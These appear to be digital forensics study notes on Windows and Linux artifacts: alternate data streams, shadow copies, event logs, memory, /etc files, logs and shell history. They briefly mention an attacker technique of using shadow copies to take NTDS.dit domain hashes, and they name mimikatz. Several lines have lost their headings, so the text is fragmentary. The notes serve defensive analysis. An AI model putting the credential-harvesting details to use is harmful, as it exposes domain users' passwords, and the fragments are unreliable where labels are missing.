Hidden File Compartments
The NTFS file system provides applications the ability to create alternate data streams of information. By default, all data is stored in a file's main unnamed data stream, but by using the syntax 'file:stream', you are able to read and write to alternates.
Get-Item -path .\hello.txt -stream *Get-Content -path .\hello.txt -stream hiddenThe volume shadow service (VSS) maintains backup files. An examiner may be able to locate previous versions of files and re-create them from the various snapshots stored on a Windows system. This can be a valuable source of evidence even if a user deleted, wiped, or otherwise cleaned up files in an attempt to cover their tracks.
Microsoft Active Directory servers maintain credential hashes forall domain users in the %systemroot%/NTDS/NTDS.dit databased file. This file is heavily protected by the system. Attackers can use a technique to leverage VSS to enable access to a backup of NTDS.dit, and thereby gain all credential hashes for the domain users in an environment.
Each user that has logged into the system and accessed the volume will have a Recycle Bin subfolder with their security identifier (SID). The files the user sent to the Recycle Bin will be stored in their personal subfolder. Analysts have observed that attackers will frequently leave tools and utilities in the root of the recycle bin (e.g., C:\Recycler\ or C:$Recycle.bin).
The event logs AppData.evt, SecEvent.evt, and SysEvent.evt (or Application.evtx, Security.evtx, and System.evtx in Windows 7/Server 2008) contain logged information about the system. 540 and 528 events in SecEvent.evt and 4624 in Security.evtx record interactive logins.
The page file {system root}/ pagefile.sys, by default, swaps memory to and from processes that are running in the background or foreground. Forensically interesting artifacts that can be found in memory include:
- running processes,
- Windows event log records,
- plain-text passwords for various applications,
- Windows credentials.
- string Encrypted file systems can be difficult to decrypt without credentials. Fortunately, the Windows memory may maintain encrypted file system passwords in memory. (mimikatz)
RAR Passwords:
Attackers frequently use the Winlabs RAR compression application on the command line to encrypt and compress data they intend to steal.
When the attacker encrypts the RAR file, the command switch “-hp” must be passed along with a password on the command line.
Searching memory for the string “-hp” has resulted in successes in finding attackers’ passwords in memory or on disk.
contains system configuration include information about the version of the distribution, services, runlevel, and time zone. . It can be thought of as roughly the equivalent of the Windows Registry.
passwd contains a list of user and system accounts. the user hash will be marked with “X” if it is located in the shadow file. The shadow file contains the hash values of each user’s password hash.To search for accounts with login privileges, an analyst can use the grep –v nologin on the password file.
The hosts file maps hostnames to IP addresses and is given priority over DNS by default.
The hostname file keeps the host name of the current host.
version in the/etc directory. This file can be found by doing an ls *release*” or “ls *version*
contains majority of log files, some log files might be located in/var/adm.
wtmp is a binary log file that contains the historical login information for the system. The file utmp contains a list of currently logged-in users (more important when doing live response). The file can be viewed by using last –f {path to wtmp/utmp},
includes SSH logins and “su” (commands issued by the super user) events.
includes system messages, software messages, and events that are not found in other logs. Default settings roll the log over weekly, and historical copies are kept for four weeks.
The dmesg file is a copy of the daily login events followed by hardware messages. This can include the most recently assigned DCHP address for a host. It also can contain USB information that may be valuable when an analyst is trying to export data to a USB device.
If the auditd service is enabled on a system, it will maintain process accounting. These files can be read as plain text or can be processed using the aureport –if {audit.log} option (if the auditd package is installed on the analysis system).
The shell history of a user is kept in their home directory. BASH is stored in .bash_history or ksh, and zshell or cshell are typically stored in .history. The most common, .bash_history, does not contain a timestamp, while other shells such as zshell maintain UNIX timestamps for every command.
Linux memory artifacts include the memory RAM and a Swap file. Linux also uses a virtualized form of memory. The swap file, called/swap by default, swaps memory to and from processes that are running in the background or foreground. Linux memory processes can be extracted from the virtualized/proc directory while the system is running. Forensically interesting artifacts that can be found in memory include:
- running processes,
- plain-text passwords for various applications, � log events, and
- strings.
LiME (Linux Memory Extractor) is a tool designed to retrieve memory from Linux systems. Prior to the kernel level 2.6, memory was unprotected and could be extracted using a
ddcommand to copy/dev/mem to a file. Tools, such as Volatility, can be configured to analyze Linux memory images but must be fine-tuned based on kernel settings and configuration of the OS.